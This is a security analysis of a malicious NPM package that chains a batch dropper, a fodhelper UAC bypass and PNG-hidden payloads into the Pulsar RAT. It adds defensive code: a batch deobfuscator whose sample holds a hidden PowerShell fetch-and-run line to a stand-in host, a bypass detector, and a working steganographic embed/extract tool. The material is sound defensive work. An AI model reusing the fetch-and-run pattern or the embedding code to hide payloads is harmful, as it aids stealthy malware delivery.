A technical analysis by Veracode reported that a malicious NPM package named buildrunner-dev drops an obfuscated 1,653-line batch loader and hides encrypted payloads inside PNG images, including a 59,176-byte payload that decompressed to a 136 KB .NET loader and a 976 KB Pulsar RAT.
KEY FACTS
- Incident: A typosquatted NPM package named buildrunner-dev was published with a postinstall downloader
- Delivery: The postinstall hook fetched a batch dropper and wrote a persistent copy to the Windows Startup folder
- Technique: Payloads were embedded in the RGB pixel values of PNG images hosted on i.ibb.co
- Final payload: Extraction produced a .NET loader and a Pulsar Remote Access Trojan
The dropper was a heavily obfuscated batch script of more than 1,600 lines in which 909 small variables, each holding a fragment of text, are concatenated at runtime to form a PowerShell downloader. The script copies itself to %AppData% as protect.bat and writes a copy to the Startup folder for persistence.
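The variable-fragment trick is cheap to undo statically once the script is on disk. The following is an added example, not Veracode's tooling or the campaign's code: it collects every `set "name=fragment"` assignment, then resolves `%name%` references in the remaining command lines without executing anything. The sample batch text, its fragment names and the defanged URL are constructed for the example, and the decoder assumes the plain `set`/`%name%` pattern (no delayed `!name!` expansion or `call`-based tricks).

```python
"""Static expansion of the set-variable concatenation used by obfuscated batch droppers.

Added example, not Veracode's tooling. Handles  set "name=fragment"  assignments
and %name% references only; it never runs the script.
"""
import re

SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
REF_RE = re.compile(r"%([^%\s]+)%")

# Constructed sample in the style described above (names, fragments and the
# defanged URL are invented for this example).
SAMPLE_BAT = r'''@echo off
set "x9=pow"
set "q2=ersh"
set "m5=ell"
set "k1= -w hidden -c "
set "z7=iex"
set "v3=(iwr hxxp://example.invalid/s)"
%x9%%q2%%m5%%k1%%z7%%v3%
'''


def deobfuscate_batch(text: str, max_passes: int = 16):
    """Return (variables, expanded_commands).

    variables maps lower-cased names to their fragments (cmd.exe variable lookup
    is case-insensitive); expanded_commands are the non-`set` lines with every
    %name% reference substituted.
    """
    variables = {}
    commands = []
    for line in text.splitlines():
        m = SET_RE.match(line)
        if m:
            variables[m.group(1).lower()] = m.group(2)
            continue
        stripped = line.strip()
        if not stripped or stripped.lower().startswith(("@echo off", "echo off", "rem ", "::")):
            continue
        commands.append(stripped)

    def expand(cmd: str) -> str:
        # A fragment may itself contain %other% references, so iterate until a
        # pass changes nothing or the pass budget is spent (guards against loops).
        for _ in range(max_passes):
            new = REF_RE.sub(lambda m: variables.get(m.group(1).lower(), m.group(0)), cmd)
            if new == cmd:
                break
            cmd = new
        return cmd

    return variables, [expand(c) for c in commands]


if __name__ == "__main__":
    names, cmds = deobfuscate_batch(SAMPLE_BAT)
    print(f"{len(names)} fragments resolve to:")
    for c in cmds:
        print("  " + c)
```

Unresolved `%name%` references are left in place rather than dropped, so a partially recovered command line still shows where a fragment came from a second stage or from environment variables the script did not define.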
The loader attempts privilege elevation with the fodhelper UAC bypass (MITRE ATT&CK T1548.002): it writes a temporary ms-settings protocol handler into the current user's registry hive, then launches fodhelper.exe, an auto-elevating Windows binary, so that the dropper is executed with elevated rights. The registry keys are removed after escalation.
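Because the keys are written, used and deleted within seconds, a point-in-time registry scan will miss them; the durable signal is the sequence. The correlation below is an added example and not part of Veracode's analysis. The key path it looks for is the publicly documented fodhelper variant of T1548.002, which plants a per-user `ms-settings\Shell\Open\command` handler, not a detail taken from the write-up, and the pipe-delimited event format and sample events are constructed for the example.

```python
"""Correlate ms-settings handler writes with fodhelper.exe launches (T1548.002).

Added example, not from Veracode's report. Event format and sample events are
constructed; the key path is the publicly documented fodhelper bypass location.
"""
from datetime import datetime, timedelta

MS_SETTINGS_KEY = r"\software\classes\ms-settings\shell\open\command"
WINDOW = timedelta(seconds=60)

# Constructed events: "ISO time | event type | acting process | target"
SAMPLE_LOG = r"""
2024-01-01T10:00:00 | RegValueSet   | cmd.exe      | HKU\S-1-5-21-1\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute
2024-01-01T10:00:00 | RegValueSet   | cmd.exe      | HKU\S-1-5-21-1\Software\Classes\ms-settings\Shell\Open\command\(Default)
2024-01-01T10:00:02 | ProcessCreate | cmd.exe      | C:\Windows\System32\fodhelper.exe
2024-01-01T10:00:04 | RegKeyDelete  | cmd.exe      | HKU\S-1-5-21-1\Software\Classes\ms-settings
2024-01-01T10:05:00 | RegValueSet   | setup.exe    | HKU\S-1-5-21-1\Software\Classes\.txt\(Default)
2024-01-01T11:30:00 | ProcessCreate | explorer.exe | C:\Windows\System32\fodhelper.exe
"""


def parse(log: str):
    """Turn the constructed log into (timestamp, kind, process, target) tuples."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, kind, proc, target = [f.strip() for f in line.split("|", 3)]
        events.append((datetime.fromisoformat(ts), kind, proc, target))
    return events


def detect_fodhelper_bypass(log: str):
    """One alert per fodhelper.exe launch preceded within WINDOW by a write to the
    per-user ms-settings handler key. Each alert records whether the key was
    deleted again shortly afterwards, the cleanup this campaign performed."""
    events = parse(log)
    alerts = []
    for ts, kind, proc, target in events:
        if kind != "ProcessCreate" or not target.lower().endswith("\\fodhelper.exe"):
            continue
        writes = [e for e in events
                  if e[1] == "RegValueSet" and MS_SETTINGS_KEY in e[3].lower()
                  and ts - WINDOW <= e[0] <= ts]
        if not writes:
            continue  # fodhelper.exe started without a staged handler: benign launch
        cleaned = any(e[1] == "RegKeyDelete" and "\\classes\\ms-settings" in e[3].lower()
                      and ts <= e[0] <= ts + WINDOW for e in events)
        alerts.append({"time": ts.isoformat(), "parent": proc,
                       "handler_writes": len(writes), "key_deleted_after": cleaned})
    return alerts


if __name__ == "__main__":
    for a in detect_fodhelper_bypass(SAMPLE_LOG):
        print(a)
```

The second fodhelper.exe launch in the sample has no preceding handler write and is not reported, which keeps ordinary use of the Optional Features dialog out of the alert stream.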
The downloaded PNG images carry steganographic data: the first two pixels encode the payload size, and each subsequent pixel stores three payload bytes, one in each of the R, G and B channels. One image held an obfuscated PowerShell AMSI patch; another carried a GZip-compressed .NET assembly that acts as a process-hollowing loader.
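The layout above is simple enough to extract with nothing but the standard library, which is what an analyst wants when the images have to be processed offline. The code below is an added example, not Veracode's extractor or the campaign's code. It writes and reads minimal 8-bit RGB PNGs (filter type 0 only) so the round trip runs without image libraries, and it assumes one concrete reading of the size header: a 32-bit big-endian length in the first four of the six header bytes, with the last two unused. The sample stage is a constructed GZip blob standing in for the compressed .NET assembly the second image carried.

```python
"""Embed and extract a payload in PNG pixel channels using the layout described above.

Added example, not Veracode's tooling. Assumed header layout: pixels 0 and 1
(6 channel bytes) hold the payload length as a 32-bit big-endian integer in the
first 4 bytes, 2 bytes unused; every following pixel carries 3 payload bytes
in R, G, B order. Only 8-bit RGB PNGs with filter type 0 are handled.
"""
import gzip
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
HEADER_PIXELS = 2


def _chunk(tag: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)


def write_png(width: int, height: int, pixels) -> bytes:
    """pixels: row-major list of (r, g, b) tuples with width*height entries."""
    raw = bytearray()
    for y in range(height):
        raw.append(0)  # scanline filter type 0 (None)
        for x in range(width):
            raw.extend(pixels[y * width + x])
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit RGB
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(bytes(raw))) + _chunk(b"IEND", b""))


def read_png(data: bytes):
    """Return (width, height, pixels) for an 8-bit RGB PNG whose rows use filter 0."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, bytearray(), 0, 0
    while pos + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if depth != 8 or ctype != 2:
                raise ValueError("only 8-bit RGB is handled here")
        elif tag == b"IDAT":
            idat += body
        elif tag == b"IEND":
            break
        pos += 12 + length
    raw = zlib.decompress(bytes(idat))
    stride = 1 + width * 3
    pixels = []
    for y in range(height):
        row = raw[y * stride:(y + 1) * stride]
        if row[0] != 0:
            raise ValueError("filtered scanlines not handled")
        pixels.extend(tuple(row[1 + 3 * x:4 + 3 * x]) for x in range(width))
    return width, height, pixels


def embed(payload: bytes, width: int) -> bytes:
    """Spread payload over RGB channels after the 2-pixel length header."""
    body = struct.pack(">I", len(payload)) + b"\x00\x00" + payload
    body += b"\x00" * (-len(body) % 3)            # pad to whole pixels
    pixels = [tuple(body[i:i + 3]) for i in range(0, len(body), 3)]
    height = -(-len(pixels) // width)              # ceiling division
    pixels += [(0, 0, 0)] * (width * height - len(pixels))
    return write_png(width, height, pixels)


def extract(png: bytes) -> bytes:
    """Read the length header, then recover exactly that many channel bytes."""
    _, _, pixels = read_png(png)
    channels = bytes(c for px in pixels for c in px)
    start = HEADER_PIXELS * 3
    if len(channels) < start:
        raise ValueError("image too small to hold a header")
    size = struct.unpack(">I", channels[:4])[0]
    if size > len(channels) - start:
        raise ValueError("declared size exceeds image capacity")  # truncated or forged header
    return channels[start:start + size]


# Constructed stand-in for the second stage (the campaign's image carried a
# GZip-compressed .NET assembly); this is not a real assembly.
SAMPLE_PLAINTEXT = b"MZ" + b"\x00" * 10 + b"constructed stand-in, not a real assembly"
SAMPLE_STAGE = gzip.compress(SAMPLE_PLAINTEXT)


def roundtrip(stage: bytes = SAMPLE_STAGE, width: int = 16) -> bytes:
    """Embed a GZip blob, extract it from the PNG, and decompress it."""
    return gzip.decompress(extract(embed(stage, width)))


if __name__ == "__main__":
    print(roundtrip())
```

The capacity check in `extract` matters in practice: a carrier image whose header claims more bytes than the pixels hold is either a truncated download or a decoy, and silently returning a short buffer would hand the next stage garbage.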
The .NET loader implements process hollowing; several AMSI bypasses, including a vectored exception handler that uses hardware breakpoints and a direct in-memory patch; dynamic API resolution, so the assembly carries no telltale imports; AES and TripleDES decryption of the staged payloads; and persistence logic that varies by the antivirus product present. The final extracted payload was the Pulsar RAT.
WHY IT MATTERS
This campaign demonstrates the supply chain risk carried by open source packages, and how steganography combined with layered obfuscation and encryption can keep a multi-stage payload out of sight of detection. Environments that install from default public package sources and lack runtime protections are at heightened risk.

